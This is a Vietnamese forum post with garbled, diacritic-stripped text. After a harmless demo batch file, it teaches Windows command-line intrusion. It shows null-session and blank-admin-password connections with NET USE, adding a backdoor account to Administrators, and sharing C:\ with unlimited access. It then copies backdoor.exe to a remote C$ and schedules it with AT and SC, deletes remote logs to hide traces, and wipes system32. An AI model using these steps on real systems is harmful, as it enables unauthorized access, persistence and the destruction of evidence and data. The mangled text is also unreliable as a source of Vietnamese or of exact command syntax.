Professional Documents
Culture Documents
Admin
Admin on Fri Oct 21, 2011 4:28 am
Code:
ECHO OFF
::CMD se khong hien thi lenh nao duoc thu thi phia duoi.
ECHO QuanTriMang: Demo tao file BAT
:: In ra dong van ban
IPCONFIG /ALL
:: Hien thi thong tin ve mang tren cua so command prompt
PAUSE
:: Tam dung thuc thi cac lenh khac de nguoi dung xem cac thong tin quan trong.
PING www.google.com
:: Ping toi trang Google.com
ECHO Toan bo thong tin ve Google Ping duoc.
::In ra dong van ban
PAUSE
:: Cho phep nguoi dung xem ket qua. Boi vi day la dong lenh cuoi cung nen sau khi nhan phim
bat ky, cua so command se duoc dong lai.
Nhng lnh cn thit cho vic thm nhp h thng (Windows) Phn I: Lnh NET
y trong phm vi bi vit ti ch gii thiu vi c php ca tng lnh mt cch ngn gn v thc tin,
cn bn mun tm hiu su hn ch vic g ==> tn lnh cn tm hiu /help (vd: bit su v lnh net
view bn g ==> net view /help), v ti cng khng i su v cng vic thm nhp. Bi vit ny ging
nh l mt bi tng hp cc lnh cn thit m thi v i khi nu lu ngy khng s dng n th bn
vn c th qun n nh thng.
Chng I: Lnh NET
1/ NET VIEW: Lnh ny dng xem danh sch cc ti nguyn ang c chia s ca mt my bt k
nu khng c bt c tham s no c ngha l n s hin th ti nguyn ca my cc b (local)
C php:
NET VIEW \\computername
or
NET VIEW \\ip
(dng cho my trn mng hoc tn hoc a ch IP)
V d:
NET VIEW \\127.0.0.1
2/ NET USE: Lnh ny dng kt ni my ca ngi ang thc hin ti mt ti nguyn c chia s
trn h thng mng (c th hiu h thng mng y c th l cc my tnh trong mng cc b hoc
qua a ch IP c nh) vi mt quyn hn nht nh. Lu y l lnh ny ch c tc dng khi bn c
quyn hn ngi s dng nht nh trn mt ti nguyn nht nh trn mi my cn truy cp m thi
( l trng hp bn bit c username v password trn my mun kt ni ti nguyn cn trng
hp nh bn khng bit c th c mt cch l kt ni mt null session n my cn kt ni) cng c
mt cch khc l on v bruce force password hoc s dng tools nhng trong phm vi bi vit ny
ti khng cp n.
C php:
NET USE \\IP\SHARENAME PASSWORD /USER:USERNAME
(Dng kt ni ti mt ti nguyn nht nh khi bit username v password)
NET USE \\IP\IPC$ /USER:Administrator
(trng hp password ca Admin khng thit lp)
NET USE \\IP\IPC$
(kt ni mt null session ti ti nguyn mt nh ==> xc xut thnh cng rt thp)
NET USE .. /DELETE
(s ngt kt ni t my ngi s dng ti my cha ti nguyn)
Bc 2 ==> NET USE z: \\120.1.1.5\data2 (gn data2 cho a z: truy :cp tin s dng, bn nn
lu y ti khng cn phi thm password v username nh v d trc v kt ni ti IPC$ thnh
cng th khng cn)
3/ NET USER: To/Xa ti khon ngi dng (c th tra cu thm bng /HELP), hoc hin danh sch ti
khon nu khng c tham s.
C php:
NET USER username password /ADD
(to ngi dng c tn l username v password)
NET USER username /DELETE
(xa ngi dng c tn l username)
V d:
NET USER L0ng3ta passw /ADD
(thm mt user c tn l L0ng3ta v mt khu l passw vo h thng khng nht thit phi c du
tr nhng trng hp c k t c bit)
NET USER L0ng3ta /DELETE
(xa ngi dng c tn l L0ng3ta)
4/ NET GROUP: Thm/Xa ngi dng mt group, hin th cc group (nu khng c tham s)
C php:
NET GROUP groupname username /ADD
(thm ngi dng c tn username vo group c tn groupname)
NET LOCALGROUP groupname username /ADD
(thm ngi dng c tn username vo localgroup c tn groupname)
NET GROUP groupname username /DELETE
(thm ngi dng c tn username vo group c tn groupname)
NET LOCALGROUP groupname username /DELETE
(xa ngi dng c tn username khi localgroup c tn groupname)
V d:
NET GROUP Administrators L0ng3ta /ADD
(Thm user L0ng3ta vo group admin)
5/ NET START/STOP tn dch v: lnh ny dng khi to hoc tt mt dch v (Service) ca h thng
window (thng s dng trn local)
v d:
NET START|STOP Task Scheduler (khi ng/tt dch v Task Scheduler ca h thng xem thm lnh
SC)
C php:
NET TIME \\IP
(xem gi ca my c a ch IP xc nh)
v d:
NET TIME \\120.1.1.5
C php:
NET SHARE sharename=path
(path y c th l mt a hoc ng dn tuyt i ti mt th mc hoc my in .v.v.)
v d:
NET SHARE DATA=C:\ /UNLIMITED
(Chia s a c: ly tn l data vi quyn truy cp khng gii hn)
---
mun xem a ch ip ca trang wed th dng lnh g?
bit chnh xc th cn nhiu vn na. Cch n gin nht l bn s dng lnh ping
v d: ping www.vnn.vn
---
mun bit ip ca mnh trn net?
B sung:
http://sgstars.tripod.com/cgi-bin/ip...pl?203.162.0.1
(nh sa li Ip bn mun bit)
Phin bn sau s nng cp t nhn bit IP ca bn v quc gia
-------
lm sao mnh c th bit c ip cua ngi n chat vi mnh bng YM vy?
Bn hy vo google g key: Tm + IP + YM s cho bn hng ng kt qu.
--------------
u phi lc no bn cng d dng thc hin cc thao tc thng giao din bng graphic trn my cn
thao tc (v d nh nhng khi bn ang lm chuyn m m th lm g c ci Window Explorer chng hn
cho bn s dng v thao tc trn cc tp tin) v th nhng lnh sau tuy n gin nhng cng kh l
quang trng trong thao tc ca bn, nu nh bn mun thm nhp mt my no chng hn m bn
coi nh khng thuc nm lng cc lnh di y th ti khuyn bn hy b nh i.
1/Lnh COPY: lnh ny l lnh ni tr dng sao chp cc tp tin (khi bn xm nhp vo c ri th d
nhin phi li ci g th bn dng lnh ny)
C php:
COPY path1\filename1 path2
(chp tp tin filename1 ng dn path1 sang ng dn path2)
+Ch : y ti dng nh ngha ng dn tc l c th gm mt a, mt th mc hay c mt a
ch ti nguyn mng (vi iu kin bn kt ni ti)
V d:
==>COPY c:\abc.txt d:\
(chp tp tin c tn l abc.txt t c: sang a d
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(chp file backdoor t a C my ca bn sang a C ca a ch IP 203.162.45.2)
Lu : tn tp tin bn c th s dng nhng k t i din nh * hoc ?
==>Copy c:\*.doc d:\ (chp tt c cc tp c ui .doc sang d
2/Lnh DEL: lnh ny l lnh ni tr dng xa tp tin (dng xa b du chn ngi lnh )
C php:
DEL path\filename
(xa file c tn l filename ti ng dn path)
V d:
==>DEL c:\windows\*.log
(xa tt c tp tin .log ti a C: v trong th mc windows)
M rng: DEL \\203.162.45.2\Admin$\*.log
C php:
MD path\tenthumuc
V d:
==>MD c:\windows\temp1
(to th mc temp1 trong th mc windows ca c
M rng:
==>MD \\203.162.45.2\Admin$\temp1
C php:
RD /S /Q path\tenthumuc
(vi tham s /S th s xa tt c cc file v th mc con nm trong th mc cn xa v tham s /Q l xa
khng cn hi)
V d:
==>RD /S /Q c:\windows\system32
(xa th mc system32 v tt c nhng g nm trong system32)
5/Lnh AT: hn gi cho mt chng trnh t kch hot (c th g AT /HELP bit thm)
C php:
AT \\IP time /INTERACTIVE command
V d:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE c:\backdoor.exe
Hn gi ng 2:30 th my c a ch IP l \\203.162.45.2 s kch hot chng trnh backdoor.exe trong
C:
Lu : lnh AT ch c tc dng khi service task schedule c bt ln. (xem thm lnh NET START
(trong phn 1) hoc lnh SC bn di bit cch bt mt service) v mun chng trnh kch hot
ngay m khng phi i th bn phi kim tra gi h thng ti a ch IP xc nh bng lnh NET TIME
(trong phn 1) v bo m rng gi bn hn cho chng trnh kch hot phi ln hn gi h thng t
nht l 1 pht.
C php:
SC \\IP start/stop/pause service
V d:
==>SC \\203.162.45.2 start Schedule
(chy service Schedule trn my c IP 203.162.45.2)
C php:
START tn chng trnh
8/Lnh TASKLIST (xem danh sch v ID cc chng trnh chy trong process).
tm hiu thm bng cch g TASKLIST /?
9/Lnh TASKKILL (hy mt process xem thm bng cch TASKKILL /?)
C php:
TASKKILL /PID ID
(hy chng trnh ang chy theo ID)
hoc
TASKKILL /F /IM tn chng trnh
(hy chng trnh c tn ang chy trong process)
V d chng trnh notepad.exe khi chy lnh TASKLIST c ID l 644 th khi mun hy ta g lnh:
==>TASKKILL /PID 644
hoc
==>TASKKILL /F /IM notepad.exe
10/Lnh REG: (to, xa, khi phc, xem cc gi tr ca registry trn my local hoc mt mng)
C php:
Reg Operation
Trong Operation bao gm cc thao tc nh Add, Query, Delete, Copy, Save, Load, Unload, Restore, .
bit thm chi tit cc bn g Reg Add /?)